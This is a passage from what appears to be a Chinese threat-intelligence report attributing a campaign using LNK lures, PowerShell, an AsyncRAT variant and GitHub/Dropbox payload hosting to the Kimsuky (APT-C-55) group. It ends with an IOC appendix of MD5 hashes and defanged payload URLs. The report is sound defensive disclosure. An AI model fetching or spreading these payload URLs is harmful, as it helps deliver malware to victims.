UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">im</span><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">suky组织利用</span></font><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">GitHub作为载荷平台</span><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">的攻击方式以来</span></font><sup><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">[1]</span></sup><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">，该组织一直保留这种攻击方式。</span></font></p><p style="text-indent: 2em;text-align: justify;margin-top: 16px;margin-bottom: 16px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">2</span><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">．本次利用</span></font><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">.</span></font><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">docx.lnk</span><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">的文件作为攻击入口，同时</span></font><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">l</span></font><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">nk</span><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">执行恶意载荷的文件名含有</span></font><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">“</span></font><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">s</span></font><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">etting.ini”等字符串，</span><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">这和以往攻击方式类似。</span></font></p><p style="text-indent: 2em;text-align: justify;margin-top: 16px;margin-bottom: 16px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">3.</span><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">l</span></font><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">nk</span><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">读取自身数据解密出诱饵文档以及使用</span></font><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">p</span></font><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">o</span><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">wershell脚本执行</span></font><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">C#</span><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">程序的方式也和该组织以往利用方式符合，并且</span></font><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">AsyncRAT变体在该组织之前的攻击活动中也被使用过</span><sup><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">[</span></font></sup><sup><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">2]</span></sup><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">。</span></font></p><p style="text-indent: 2em;text-align: justify;margin-top: 16px;margin-bottom: 16px;"><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">4.样本上传地为韩国地区，分析受害者信息我们发现和之前攻击行动存在相同受害者。</span></font></p><p style="text-indent: 2em;margin-top: 16px;margin-bottom: 16px;"><span style="text-align: justify;color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">综上，</span></font></span><span style="text-align: justify;color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">我们较有把握</span></font></span><span style="text-align: justify;color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">将本轮攻击行动归属到</span></font><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">APT-C-55（</span></span><span style="text-align: justify;color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">Kimsu</span></font></span><span style="text-align: justify;color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">ky）组织。</span></span></p><div data-role="outer" style="margin-right: 0px;margin-left: 0px;padding: 0px;box-sizing: border-box;"><div data-tools="135编辑器" data-id="101849" style="margin-right: 0px;margin-left: 0px;padding: 0px;box-sizing: border-box;"><div style="margin-right: 0px;margin-left: 0px;padding: 0px;box-sizing: border-box;"><div style="margin-right: 0px;margin-left: 0px;padding: 0px;display: flex;box-sizing: border-box;transform: rotate(0deg);"><p data-brushtype="text" style="margin-right: 0px;margin-left: 0px;padding: 0px 1em;color: rgb(242, 242, 242);height: 32px;font-size: 16px;background-color: rgb(190, 25, 31);letter-spacing: 1.5px;box-sizing: border-box;"><strong style="margin-right: 0px;margin-left: 0px;padding: 0px;"><span style="margin-right: 0px;margin-left: 0px;padding: 0px;font-size: 17px;"><span leaf="">总结</span></span></strong></p></div><div style="margin-right: 0px;margin-left: 6px;padding: 30px 15px 10px;background-color: rgb(242, 242, 242);flex-shrink: 0;box-sizing: border-box;"><div data-autoskip="1" style="margin-right: 0px;margin-left: 0px;padding: 0px;letter-spacing: 1.5px;font-size: 17px;box-sizing: border-box;"><div style="margin-right: 0px;margin-left: 0px;padding: 0px;text-indent: 2em;box-sizing: border-box;"><p style="background-color: rgb(242, 242, 242);flex-shrink: 0;letter-spacing: 1.5px;font-size: 17px;margin: 0px 0px 8px;padding: 0px;text-indent: 2em;box-sizing: border-box;"><span leaf="">本次攻击中Kimsuky组织通过滥用合法平台作为通信与分发通道，下发恶意载荷并回传窃取数据，从而有效规避了传统基于特征与流量行为的网络检测与响应（NDR）机制。这类“以合法掩护恶意”的方式，使攻击流量在表面上与正常业务通信高度相似，大幅降低了被识别与拦截的概率。同时，攻击者采用插件化、模块化的木马架构，在初始入侵后可按需动态加载不同功能模块（如信息窃取、横向移动等），从而实现更隐蔽且灵活的攻击流程。</span></p><p style="text-indent: 2em;margin-top: 0px;margin-bottom: 8px;"><span leaf="">此外本文披露的相关恶意代码、C&amp;C只是APT-C-55组织近期部分攻击过程中的所使用的载荷，该组织不会因为一次攻击行动的暴露而停止活动，反而会持续更新其载荷。在这里提醒用户加强安全意识，不要执行未知样本、点击来历不明的链接等，否则容易在毫无防范的情况下被攻陷，进而泄漏机密文件、重要情报。</span></p></div></div></div></div></div></div></div></div><div data-role="outer" label="edit by 135editor" data-pm-slice="0 0 []"><div style="margin: 2em auto 0px;padding: 0.5em 0px;white-space: normal;border-right: none;border-bottom: none;border-left: none;border-image: initial;border-top: 1px solid rgb(204, 204, 204);display: block;font-size: 15px;font-style: normal;font-weight: inherit;text-decoration: inherit;color: rgb(166, 166, 166);box-sizing: border-box;font-family:inherit;"><p style="margin-top: -1.2em;text-align: center;padding: 0px;border: none;line-height: 1.4;box-sizing: border-box;"><span style="font-size:15px;"><strong><span style="background-color: rgb(15, 15, 25);border-color: rgb(183, 184, 184);color: rgb(255, 255, 255);font-style: normal;padding: 8px 23px;text-align: center;text-decoration: inherit;font-family:inherit;"><span leaf="">附录 IOC</span></span></strong></span></p></div></div><p style="margin-bottom: 8px;margin-top: 8px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 15px;font-weight: bold;">MD5:</span></span></p><p style="margin-bottom: 8px;margin-top: 8px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 15px;font-weight: normal;">ba8e682a72c6a3e634c070f0fb057bf5</span></span></p><p style="margin-bottom: 8px;margin-top: 8px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 15px;font-weight: normal;">bd17b8b10675031cec05c0cd8a001fac</span></span></p><p style="margin-bottom: 8px;margin-top: 8px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 15px;font-weight: normal;">0d8ceb7dea7d471afa2f8e753b13d2d6</span></span></p><p style="margin-bottom: 8px;margin-top: 8px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 15px;font-weight: normal;">d9d7d5feb2abc828b58142fc63509d80</span></span></p><p style="margin-bottom: 8px;margin-top: 8px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 15px;font-weight: normal;">e0e4aec6d494fe68cdaa52d6878a8366</span></span></p><p style="margin-bottom: 8px;margin-top: 8px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 15px;font-weight: normal;">b406ea5b8628cb7801f47c0189b96182</span></span></p><p style="margin-bottom: 8px;margin-top: 8px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 15px;font-weight: normal;">23da5ff2ed7bd4ac5a2a148afc037b6a</span></span></p><p style="margin-bottom: 8px;margin-top: 8px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 15px;font-weight: normal;">45b6b7dadc13e4a4cc30dd82eb58c3ed</span></span></p><p style="margin-bottom: 8px;margin-top: 8px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 15px;font-weight: normal;">73ff669fc282653bd6c42cf87ade9337</span></span></p><p style="margin-bottom: 8px;margin-top: 8px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 15px;font-weight: normal;">02ebc2356f9f700bbdac444cdefa0da2</span></span></p><p style="margin-bottom: 8px;margin-top: 8px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 15px;font-weight: normal;">849ddfdba810b251522690d51475a359</span></span></p><p style="text-indent: 0px;margin-bottom: 8px;margin-top: 8px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 15px;font-weight: bold;">IOC:</span></span></p><p style="text-indent: 0px;margin-bottom: 8px;margin-top: 8px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 15px;font-weight: normal;"><a href="https://www.dropbox[.]com/scl/fi/0m6mp6c53dnj6eird0kpd/setting.ini?rlkey=s5ef1qsa9krhxcqkn3cthrs7e&amp;st=ip1rnvm2&amp;dl=0" target="_blank">https://www.dropbox[.]com/scl/fi/0m6mp6c53dnj6eird0kpd/setting.ini?rlkey=s5ef1qsa9krhxcqkn3cthrs7e&amp;st=ip1rnvm2&amp;dl=0</a></span></span></p><p style="text-indent: 0px;margin-bottom: 8px;margin-top: 8px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 15px;font-weight: normal;"><a href="https://raw.githubusercontent[.]com/shantez41/EDGTy/refs/heads/main/hawek.ini" 